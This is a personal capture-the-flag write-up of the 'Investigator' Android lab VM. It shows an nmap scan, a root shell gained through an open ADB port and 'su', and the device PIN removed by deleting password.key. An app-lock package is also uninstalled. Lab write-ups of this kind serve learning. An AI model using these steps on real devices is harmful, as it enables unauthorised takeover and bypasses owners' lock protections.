靶机日记 三 | Investigator

You can find the machine there > Investigator

This is my first time to hack a Android box. Actually , i have no experience in Android development , but this is a beginner Vuln target machine, i say to myself, it’s a great way to learn something new!

start always with nmap

Princeling-Mac at ~ ❯ nmap -sC -sV -p- -oN nmap/initial 192.168.56.103
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 01:52 EEST
Nmap scan report for android-25abe18209db8058.zte.com.cn (192.168.1.10)
Host is up (0.00025s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
5555/tcp  open  adb     Android Debug Bridge device (name: android_x86; model: VMware Virtual Platform; device: x86)
8080/tcp  open  http    PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Welcome To  UnderGround Sector
22000/tcp open  ssh     Dropbear sshd 2014.66 (protocol 2.0)
| ssh-hostkey:
|   2048 19:e2:9e:6c:c6:8d:af:4e:86:7c:3b:60:91:33:e1:85 (RSA)
|_  521 46:13:43:49:24:88:06:85:6c:75:93:73:b5:1d:8f:28 (ECDSA)
MAC Address: 00:0C:29:37:42:7C (VMware)
Service Info: OSs: Android, Linux; CPE: cpe:/o:linux:linux_kernel

Tcp port 5555 is an Android Debug service, we can use adb tools to exploit it.

expliot with adb service

Princeling-Mac at ~ ❯ adb connect 192.168.56.103
connected to 192.168.56.103:5555
Princeling-Mac at ~ ❯ adb shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $

We can even get root shell easily , just type in ‘su’.

uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ su
uid=0(root) gid=0(root)@x86:/ # find / -type d -name root
find: /data/property/persist.sys.dalvik.vm.lib: Input/output error
/data/root

And get the first key!

1|uid=0(root) gid=0(root)@x86:/ # cd /data/root/
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txt
uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt
Great Move !!!

Itz a easy one right ???

lets make this one lil hard


You flag is not here  !!!


Agent "S"   Your Secret Key ---------------->259148637
uid=0(root) gid=0(root)@x86:/data/root #

259148637is wrong pin, but we can remove pin with root shell.

uid=0(root) gid=0(root)@x86:/data/system # cd /data/system
uid=0(root) gid=0(root)@x86:/data/system # rm password.key

Reboot the box, now we can see there is no PIN, If we go to open an app asks for a pattern.

Unlock it.

uid=0(root) gid=0(root)@x86:/ # pm list packages | grep lock
package:com.domobile.applockwatcher
package:bong.android.androidlock
package:com.martianmode.applock
package:com.android.deskclock
promote at ~ ❯ adb uninstall com.martianmode.applock
Success

:(((()))) android box is hard to use !!!